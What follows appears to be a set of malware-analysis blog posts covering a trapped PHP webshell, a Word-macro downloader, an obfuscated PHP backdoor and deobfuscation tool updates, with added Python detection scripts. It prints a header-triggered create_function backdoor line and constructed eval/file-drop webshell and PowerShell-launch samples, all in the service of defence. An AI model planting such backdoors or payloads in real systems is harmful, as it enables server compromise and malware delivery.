Webshell with a Booby Trap

I came across three interesting PHP scripts that were presumably dropped by the same attacker. Perhaps this is old news but it’s something new to me.

Here’s the first one which looks innocent enough.

2015-07-24_01

However, if you put in the wrong password, you can end up at a malicious or phishing page.

2015-07-24_02

hxxp://d.pxer.tk/i.php
hxxp://a6shd.realshieldlinked.com
hxxp://zmkzz.allvideos.7664.info

Inspecting the traffic shows that the password you tried gets captured.

2015-07-24_03

Here’s what the panel looks like:

2015-07-24_04

This is the second script which looks like it failed to do anything:

2015-07-24_05

Nope, the script works just fine. It dropped a webshell in the folder.

2015-07-24_06

If you look closely, you can see that the initial file resembles a JPEG file. The file does open up as a normal graphic but embedded in it are scripts that can execute PHP, ASP, and JSP commands as well as drop a PHP webshell.

2015-07-24_07
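A quick way to catch this kind of image polyglot in an upload directory is to check the file for script markers regardless of what the header says. The following scanner is an added example (it is not code from the post or from the files it describes); the JPEG header bytes, the comment-segment payload and the trailing PHP are constructed test data, and the marker list is an assumption about what is worth flagging, not an exhaustive signature set.

```python
import re

# Script markers that have no business inside an image file: PHP, ASP and JSP
# tags plus the usual execute/write helpers. Patterns are bytes because the
# input is binary.
SCRIPT_MARKERS = [
    (re.compile(rb"<\?php\b", re.I), "PHP open tag"),
    (re.compile(rb"<\?=\s"), "PHP short echo tag"),
    (re.compile(rb"<%@\s*page", re.I), "JSP page directive"),
    (re.compile(rb"<%[\s=]"), "ASP/JSP scriptlet"),
    (re.compile(rb"<script[^>]*\brunat\s*=\s*['\"]?server", re.I), "ASP server-side script"),
    (re.compile(rb"\b(?:eval|system|passthru|shell_exec|assert)\s*\(", re.I), "code-execution call"),
    (re.compile(rb"\bfile_put_contents\s*\(", re.I), "file-drop call"),
]

JPEG_SOI = b"\xff\xd8\xff"   # start of image
JPEG_EOI = b"\xff\xd9"       # end of image


def scan_image(data: bytes) -> dict:
    """Flag script markers anywhere in an image blob and measure any bytes
    appended after the JPEG end-of-image marker. The image may still decode
    normally; the point is that a viewer ignores what a web server may execute."""
    is_jpeg = data.startswith(JPEG_SOI)
    hits = sorted((m.start(), label)
                  for pattern, label in SCRIPT_MARKERS
                  for m in pattern.finditer(data))
    eoi = data.rfind(JPEG_EOI)
    trailing = len(data) - (eoi + len(JPEG_EOI)) if is_jpeg and eoi != -1 else 0
    return {
        "is_jpeg": is_jpeg,
        "hits": hits,                                  # (offset, label) pairs
        "labels": sorted({label for _, label in hits}),
        "trailing_bytes_after_eoi": trailing,
        "suspicious": bool(hits),
    }


# Constructed samples (not the files from the post).
# A minimal SOI + JFIF APP0 segment, then EOI: a "clean" stand-in for a real JPEG.
JFIF_HEADER = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
CLEAN_JPEG = JFIF_HEADER + JPEG_EOI

# A polyglot: a COM (comment) segment carrying a PHP tag, plus more PHP glued on after EOI.
COMMENT_PAYLOAD = b"<?php eval($_POST['c']); ?>"
TRAILER = b"<?php file_put_contents('s.php', $_GET['d']); ?>"
POLYGLOT = (JFIF_HEADER
            + b"\xff\xfe" + (len(COMMENT_PAYLOAD) + 2).to_bytes(2, "big") + COMMENT_PAYLOAD
            + JPEG_EOI
            + TRAILER)

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_JPEG), ("polyglot", POLYGLOT)):
        print(name, scan_image(blob))
```

Run it over every file in an upload directory and quarantine anything with `suspicious` set; a non-zero `trailing_bytes_after_eoi` on its own is worth a look too, since legitimate image tools stop writing at the EOI marker.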

The third script looks like this when you open it in the browser. It’s a seemingly benign page from the PHP Documentation website.

2015-07-24_08

However, if you append a certain value to the URL, a hidden feature is enabled at the bottom of the page and you can now upload any file of your choice.

2015-07-24_09

Ah, more things to be on the lookout for…

Posted in Malscript

Converter Updated

The latest version includes several new features which I’d like to highlight here:

Enhanced Range Search/Replace
The feature can be found by going to this menu item under Tools:

2015-06-20_01

You can now add incrementers as a text replacement as seen in this graphic. Just add ^i if you want to start with 0 or ^I if you want to start with 1. If you check the “Keep Enclosed Contents” box, the “from” and “to” values will be included in the results (inclusive).

2015-06-20_02

The other option is called “Keep Value From String… and To String…” which just keeps the in-between values.

2015-06-20_03

New Hashing Algorithms
Added new hashing algorithms (credit: Karim Wafi) under the stats menu:

2015-06-20_04

Convert Mixed Format
I moved the mixed format options from under the Format menu to its own form under the Tools menu. I included examples so you can understand what it’s used for.

2015-06-20_05

I also added a “Mixed Entities to Hex” feature. There’s a button on the main screen called “Decode HTML” to decode HTML entities but if your input string has a mixture of HTML entities and other text, it fails. This feature will convert your input to hex then you can convert it back to text to get your results.

2015-06-20_06

Microsoft Script Decoder
Microsoft Script Encoded strings are now being seen in the wild. I added a script encoder and decoder function in two places (credit: Jean-Luc Antoine and Shawn Stugart).

If you have a large file to convert, you can use the Convert Script File option by going here:

2015-06-20_07

This is the form which allows you to choose an input file, output file, and option.

2015-06-20_08

The input file you wish to decode needs to contain only the script, which starts with #@~^… and ends with ^#~@.

2015-06-20_09

If you have a short string to decode then you can use the Script Encoder/Decoder feature which is located under the Tools menu.

2015-06-20_10

Just paste in the script and make sure it contains the starting and ending key values.

2015-06-20_11
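When a landing page carries several encoded scripts, it helps to pull out each #@~^ … ^#~@ envelope together with the language its script tag claims before pasting anything into the decoder. The helper below is an added example, not part of Converter or of the post; the sample page is constructed and its encoded bodies are placeholder text, not real Script Encoder output.

```python
import re

# The encoder's envelope: "#@~^" opens the block and "^#~@" closes it.
ENCODED_BLOCK = re.compile(r"#@~\^.*?\^#~@", re.S)
SCRIPT_TAG = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.S | re.I)
LANG_ATTR = re.compile(r"\blanguage\s*=\s*['\"]?([\w.]+)", re.I)


def find_encoded_scripts(page: str) -> list:
    """List every encoded block on a page with the language its <script> tag claims."""
    found = []
    for idx, tag in enumerate(SCRIPT_TAG.finditer(page)):
        attrs, body = tag.group(1), tag.group(2)
        lang = LANG_ATTR.search(attrs)
        for block in ENCODED_BLOCK.finditer(body):
            found.append({
                "script_index": idx,
                "language": lang.group(1) if lang else "(none)",
                "payload": block.group(0),
            })
    return found


def extract_payload(text: str) -> str:
    """Trim anything outside '#@~^ ... ^#~@', which is all the decoder form should receive.
    Raises if the envelope is incomplete so a truncated paste is caught early."""
    m = ENCODED_BLOCK.search(text)
    if not m:
        raise ValueError("no complete #@~^ ... ^#~@ block found")
    return m.group(0)


# Constructed page: two tags claiming JScript.Encode, one VBScript.Encode, and a
# plain-JS tag that must not be reported. Bodies are placeholders, not encoder output.
SAMPLE_PAGE = """<html><body>
<script language="JScript.Encode">#@~^AAAAAA==PLACEHOLDER_ONE==^#~@</script>
<script>var plain = 1;</script>
<script language='JScript.Encode'>#@~^BBBBBB==PLACEHOLDER_TWO==^#~@</script>
<script language=VBScript.Encode>#@~^CCCCCC==PLACEHOLDER_THREE==^#~@</script>
</body></html>"""

if __name__ == "__main__":
    for entry in find_encoded_scripts(SAMPLE_PAGE):
        print(entry["script_index"], entry["language"], entry["payload"])
```

Each payload returned is exactly what the decoder expects as input, so the output can be written to one file per script and fed to the Convert Script File form.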

Deobfuscating “Sundown EK”
Now let’s use some of the features to deobfuscate “Sundown’s” landing pages. Here’s a look at the exploit chain in Fiddler (credit: Kafeine):

2015-06-20_12

The first file is the landing page which looks like this:

2015-06-20_13

Paste that into Converter, choose Tools > Convert Mixed Format, click on the Mixed Entities to Hex option and click on Convert. To make things a bit easier, choose the “Percent” output format at the bottom. (This saves you from having to do a Format > Hex Format – % in the next step.)

2015-06-20_14

Click on the “Copy Output to Input” button then click on the “Hex to Text” button. Almost done…you can see some hex values in there.

2015-06-20_15

So click on the “Copy Output to Input” button then click on the “Unescape” button. Now we’re done.

2015-06-20_16
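The three Converter steps above (Mixed Entities to Hex, Hex to Text, Unescape) are easy to script for a whole batch of landing pages. This is an added example in Python, not Converter's code; the sample input is constructed and uses a reserved `example.invalid` host rather than anything from the real Sundown traffic.

```python
import html
import re
from urllib.parse import unquote

# Numeric (decimal or hex) and named HTML entities, captured so split() keeps them.
ENTITY = re.compile(r"(&#x[0-9a-fA-F]+;|&#[0-9]+;|&[A-Za-z][A-Za-z0-9]*;)")


def mixed_entities_to_hex(text: str) -> str:
    """Step 1: turn a mixture of HTML entities and plain text into one %XX stream.
    Entities are resolved to their characters; every character, entity-derived or
    not, is then emitted as the percent-encoded bytes of its UTF-8 form."""
    out = []
    for piece in ENTITY.split(text):
        if not piece:
            continue
        decoded = html.unescape(piece) if piece.startswith("&") else piece
        out.append("".join("%%%02X" % b for b in decoded.encode("utf-8")))
    return "".join(out)


def hex_to_text(percent_hex: str) -> str:
    """Step 2: %XX bytes back to text (the 'Hex to Text' button)."""
    return unquote(percent_hex)


def js_unescape(s: str) -> str:
    """Step 3: the JavaScript unescape() semantics, %uXXXX first, then %XX."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"%([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)


def decode_landing_page(blob: str) -> str:
    """The full chain: entities -> hex -> text -> unescape."""
    return js_unescape(hex_to_text(mixed_entities_to_hex(blob)))


# Constructed sample: "document" as decimal entities, quotes/angle brackets as named
# entities, and percent-escapes left for the final unescape pass.
SAMPLE = ("&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;"
          ".write(&quot;&lt;iframe src=%22h%74tp://example.invalid/x%22&gt;&quot;);")

if __name__ == "__main__":
    print(mixed_entities_to_hex(SAMPLE))
    print(decode_landing_page(SAMPLE))
```

Because step 1 percent-encodes a literal `%` as `%25`, the page's own `%XX` escapes survive step 2 untouched and are only resolved in step 3, which is the same ordering the Converter buttons impose.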

Back to Fiddler…I chose the 10th item called “street4.php.htm”. Here’s what that looks like:

2015-06-20_17

There are three scripts on this page. Two are encoded as “JScript.Encode” and the third as “VBScript.Encode”; however, it’s the same encoder. I did the first one above so let me do the second.

2015-06-20_18

Click on “Send Data to Main” then click on the “Unescape” button.

2015-06-20_19

For the third script, let me paste that into its own file.

2015-06-20_20

I make my selections and click Convert.

2015-06-20_21

And we’re done!

2015-06-20_22

Here are the other changes/fixes that were made to Converter:

  • Update the Beautify JS and HTML function (credit: jsbeautifier.org)
  • Correctly rotate non-CSV hex values and the text values in the Key Search/Convert feature
  • Clear the output text box when the Import Binary File function starts
  • Update the results when the space and colon delimiter options are used in conjunction with the Format > Hex function
  • Add new input delimiter to Convert Base feature
  • Include last value when doing Octal to Hex function
  • Add new options colon, space and unicode to Format > Hex Format feature

You can download Converter here. Thank you for your support!

Posted in Malscript, Tools

Malicious Word Macro Caught Using Sneaky Trick

There has been a slew of malicious Word documents attached to email purporting to be invoices, receipts, etc. This particular one caught my eye but I’m not sure if this is an old trick. I just haven’t seen this method used before and thought it was quite clever.

Here’s the email that had a zipped file attached. The zipped file contained a Word document. The email in poor English says, “Thank you for payment. Your invoice…is attached. Thank you for your business – we appreciate it very much.”

2015-03-06_01

Opening the Word document, the first thing you’ll notice is the security warning and, below it, a bunch of garbled text. A message above it says, “If you document have incorrect encoding – enable macro.”

2015-03-06_02

Clicking on the “Enable Content” button then reveals the invoice, making this (slightly) more believable and possibly enough to convince the unsuspecting recipient.

2015-03-06_03

Using OfficeMalScanner, the macros, specifically the one called “ThisDocument”, can be dumped to a file for analysis.

2015-03-06_04

Let’s try it with OleDump. It nicely shows the objects inside of the document.

2015-03-06_05

We can also dump the ‘ThisDocument’ object.

2015-03-06_06

Looking at the macro, we can see a bunch of string concatenation going on and typical garbage in between legitimate VBA code.

2015-03-06_07

A quarter of the way in, there are some URLs to take note of.

2015-03-06_08

Basically the VBA macro builds a VBS script and writes it out.

2015-03-06_09

Interestingly, this VBS calls up a Powershell file. How vogue. It’s now very clear what it’s doing — downloading and executing a file from the Internet, then downloading an image for statistics and cleaning up.

2015-03-06_10

Let me download the file…

2015-03-06_11

And see what VirusTotal has to say…

2015-03-06_12

Regarding that image download, here’s what it is:

2015-03-06_13

The image’s download stats are in that red box. Not sure how many are victims vs security folks but that could be an impressive number.

2015-03-06_14

Going back to the macro, I wanted to find out how it “decrypted” the gibberish into text. Near the bottom, I see reference to “findText” and “secondText” followed by some clean-up code.

2015-03-06_15

The findText subroutine shows that it looks for content between “<select></select>” tags then deletes it.

2015-03-06_16

The secondText routine looks for “<inbox></inbox>” tags and changes the contents’ font color to black.

2015-03-06_17

Ah! It’s not doing any decryption, it’s just some clever sleight of hand. The invoice text was there all along, hidden with white text. Here you can see the hidden content in green.

2015-03-06_18
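Once a macro has been dumped with oledump or OfficeMalScanner, a small triage script can surface the behaviours seen here (auto-run entry point, heavy string concatenation, a dropped VBS, a PowerShell launch, and the font-colour sleight of hand) before anyone reads the whole thing. This is an added example, not code from the post; the macro text it runs over is a constructed stand-in modelled on the post's description, not the real sample, and the indicator list is an assumption about what is worth counting.

```python
import re

# Constructed macro excerpt modelled on the behaviour the post describes. It is
# not the real sample: the paths are placeholders and there is no download code.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim s As String
    s = "Set o = CreateObject(" & Chr(34) & "WScript.Shell" & Chr(34) & ")"
    s = s & vbCrLf & "o.Run " & Chr(34) & "powershell -ExecutionPolicy Bypass -File C:\Temp\r.ps1" & Chr(34)
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set f = fso.CreateTextFile(Environ("TEMP") & "\i.vbs", True)
    f.Write s
    f.Close
    Shell "wscript " & Environ("TEMP") & "\i.vbs", vbHide
    findText
    secondText
End Sub

Sub findText()
    With Selection.Find
        .Text = "<select>*</select>"
        .MatchWildcards = True
        .Execute
    End With
    Selection.Delete
End Sub

Sub secondText()
    With Selection.Find
        .Text = "<inbox>*</inbox>"
        .MatchWildcards = True
        .Execute
    End With
    Selection.Font.Color = wdColorBlack
End Sub
'''

# Each indicator is a regex; the triage reports how often it fires.
INDICATORS = {
    "auto-exec entry point": re.compile(r"\b(?:AutoOpen|Document_Open|AutoExec|Workbook_Open)\b", re.I),
    "shell object / process launch": re.compile(r"WScript\.Shell|\bShell\s*\(|\bShell\s+\"", re.I),
    "writes a file to disk": re.compile(r"CreateTextFile|\.Write\b|SaveToFile", re.I),
    "file-system object": re.compile(r"Scripting\.FileSystemObject", re.I),
    "powershell invocation": re.compile(r"powershell", re.I),
    "http(s) url": re.compile(r"https?://", re.I),
    "string building with Chr()": re.compile(r"\bChr\s*\(", re.I),
    "hidden-text reveal (font colour change)": re.compile(r"Font\.Color\s*=", re.I),
}

# Marker tags used with Find, e.g. "<inbox>*</inbox>": the pairs the macro deletes or recolours.
MARKER_TAG = re.compile(r"<(\w+)>\*</\1>")


def triage_macro(src: str) -> dict:
    """Count indicator hits, concatenation operators and marker tags in dumped VBA source."""
    hits = {name: len(rx.findall(src)) for name, rx in INDICATORS.items()}
    hits = {name: n for name, n in hits.items() if n}
    return {
        "indicators": hits,
        "concat_ops": src.count("&"),          # VBA's string concatenation operator
        "hidden_text_markers": MARKER_TAG.findall(src),
        "score": len(hits),
    }

if __name__ == "__main__":
    for key, value in triage_macro(SAMPLE_MACRO).items():
        print(f"{key}: {value}")
```

The `hidden_text_markers` list is the part specific to this trick: a macro that searches for paired pseudo-tags and then changes font colour or deletes the selection is revealing pre-positioned text, not decrypting anything, which is exactly what findText and secondText do.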

Sneaky indeed.

Posted in Malicious Email, Malscript

Deobfuscating a Wicked-Looking Script

Bart Blaze, one of my security researcher friends, passed along this PHP script to me. Let’s have a look.

2015-03-03_01

It looks like PHP ate some Perl and barfed it out. First thing I asked myself is, “does this even run?” It looks like a mess but it actually runs just fine. This script makes clever use of bitwise operators. For example…

$YzuZ=n ^ ')'; // this equates to 'G'

To make this readable, I split everything by semi-colon (except when it’s between quotes). One gotcha is that this script embeds comments (# and /* */) so you have to look very closely and either leave it alone…

2015-03-03_02

Or fix it up…

2015-03-03_03
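The two manual steps above, splitting on semicolons while respecting quotes and comments and then resolving the string XORs, can be automated. The following is an added example in Python (not the author's workflow or any tool from the post); the sample script is constructed and only reuses the `n ^ ')'` expression shown above. Like PHP, it treats a bare word as an undefined constant whose value is its own name, which is why `n` XORs as the letter n.

```python
import re


def split_php_statements(src: str) -> list:
    """Split PHP source on ';' that sit outside quotes and outside
    '#', '//' and '/* */' comments. Comments are dropped from the output."""
    stmts, buf = [], []
    i, n, quote = 0, len(src), None
    while i < n:
        c = src[i]
        if quote:                                   # inside a string literal
            buf.append(c)
            if c == "\\" and i + 1 < n:             # keep escaped char verbatim
                buf.append(src[i + 1])
                i += 2
                continue
            if c == quote:
                quote = None
            i += 1
            continue
        if c in ("'", '"'):
            quote = c
            buf.append(c)
            i += 1
            continue
        if src.startswith("/*", i):                  # block comment
            end = src.find("*/", i + 2)
            i = n if end == -1 else end + 2
            continue
        if c == "#" or src.startswith("//", i):      # line comment
            end = src.find("\n", i)
            i = n if end == -1 else end
            continue
        if c == ";":
            stmt = "".join(buf).strip()
            if stmt:
                stmts.append(stmt)
            buf = []
            i += 1
            continue
        buf.append(c)
        i += 1
    tail = "".join(buf).strip()
    if tail:
        stmts.append(tail)
    return stmts


# operand ^ operand, where an operand is a quoted string or a bare word.
STR_XOR = re.compile(r"""(?P<a>'[^']*'|"[^"]*"|[A-Za-z_]\w*)\s*\^\s*(?P<b>'[^']*'|"[^"]*"|[A-Za-z_]\w*)""")


def _literal(tok: str) -> str:
    # Quoted: strip the quotes. Bare word: PHP's undefined-constant-as-string behaviour.
    return tok[1:-1] if tok[0] in "'\"" else tok


def php_string_xor(a: str, b: str) -> str:
    """PHP's '^' on two strings XORs byte by byte up to the shorter length."""
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))


def resolve_xor(stmt: str) -> str:
    """Replace every string XOR in a statement with the resulting quoted literal."""
    def repl(m):
        value = php_string_xor(_literal(m.group("a")), _literal(m.group("b")))
        return "'" + value.replace("'", "\\'") + "'"
    return STR_XOR.sub(repl, stmt)


def deobfuscate(src: str) -> list:
    return [resolve_xor(s) for s in split_php_statements(src)]


# Constructed sample: three XOR assignments hidden among both comment styles.
SAMPLE = """$YzuZ=n ^ ')'; # trailing comment; not a statement
$a='w' ^ '2'; /* block; comment */ $b="v" ^ "2";
echo $YzuZ . $a . $b;"""

if __name__ == "__main__":
    for line in deobfuscate(SAMPLE):
        print(line)
```

The splitter is deliberately conservative: it never evaluates anything, so it is safe to run over an untrusted script, and the XOR resolver only touches literal-against-literal expressions, leaving variables and function calls for a human to follow.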

After I cleaned it up, I noticed that the script boils down to the last two lines. So I just echo out each of the important variables:

2015-03-03_04

When the script is executed, I get the following values:

2015-03-03_05

Now I just replace the variable names with the corresponding values to get the final result. This creates a function with a value passed via the header (probably includes ‘preg_replace’) which turns this into a well-hidden backdoor.

// Runs only when the HTTP_A request header hashes to the expected value;
// the function body itself arrives in a second request header.
if (md5(getenv('HTTP_A')) == '5d15db53a91790e913dc4e05a1319c42') $bIywY = create_function('$a, $b, $c', getenv('HTTP_X_UP_CALLING_LINE_ID'));
$bIywY('x1o6Vm2', 'WFrkAj9', 'QcFS0u');

Be sure you check out Bart’s blog to learn more about this particular script.

Posted in Malscript

Revelo Updated

A colleague of mine received the following email in their Gmail in-box and wondered how it got past their filters and what it does.

2015-02-15_01

What almost tricked him was the fact that it called out his name. Only after looking at the originating email address did it make him pause. Good thing they didn’t spoof that. Let’s have a look at the attachment.

2015-02-15_02

It’s a Javascript file. Malicious scripts are hard to detect because they’re so easy to modify and customize. By the looks of this, it concatenates a value to the variable ‘a’ then jumps to another function. It keeps doing this until the very end then evals it. The problem is trying to find the “end”. Can you find it?

2015-02-15_03

First let’s deobfuscate this manually. You will need to find the end of all of the concatenation it’s doing then replace the eval with alert. After spending about a minute of eyeballing the script, I gave up. I did a search for “(a)” and found it in the middle.

2015-02-15_04

Just change that to “alert(a)” and execute the file with your browser and you’ll see what it does.

2015-02-15_05

An easier way is just to append the short script at the end like this. When you run the script, you get the same result as above.

2015-02-15_06

The deobfuscated script, by the way, makes an AJAX call to a website at tripenjoy.com, downloads a unique file which poses as a JPEG image, renames it as an executable, then runs it.

2015-02-15_07

The downloaded file is definitely not a JPEG image.

2015-02-15_08

The payload keeps changing and the latest one I got was nearly FUD malware according to VirusTotal.

2015-02-15_09

I’ve been meaning to update Revelo and this script prompted me to do it. The latest version lets you deobfuscate these types of scripts more quickly, using the same method we used above.

Run Revelo and paste in the Javascript (or open the file). Revelo needs the “<script></script>” tags so just click on Options > Add Script Tags and it will do so automatically.

2015-02-15_10

Choose the “Append Variable to End” method, type in “a” (the name of the variable we want to view) and click on Execute. Done!

2015-02-15_11

The second method I added is called “Intercept Return and Variable”. What this will do is intercept a user-specified variable that’s being returned from a function back to the caller.

Here’s an example. The script below passes a series of numbers to “CRYPT.obfuscate” then onto a “CRYPT.decode” function. The decode function decodes the values, converts them to a string then returns the deobfuscated result, which has been highlighted in red.

2015-02-15_12

All you need to do is select the new method and enter “return output” and click on Execute. Done!

2015-02-15_13

I also added three more options to the menu:

2015-02-15_14

    * “Send Results to Prompt when Possible” – will try to display the results in this way: prompt(1,variable).
    * “Use Double Quote” – when trying various methods to deobfuscate a script, inserting single quotes into the script may mess things up so if this option is selected, double quotes will be used instead.
    * “Convert Object to Text” – simply appends “.text” to objects in order to convert them to text where appropriate.

The latest version of Revelo is available on the Tools page.

Posted in Malicious Email, Malscript, Tools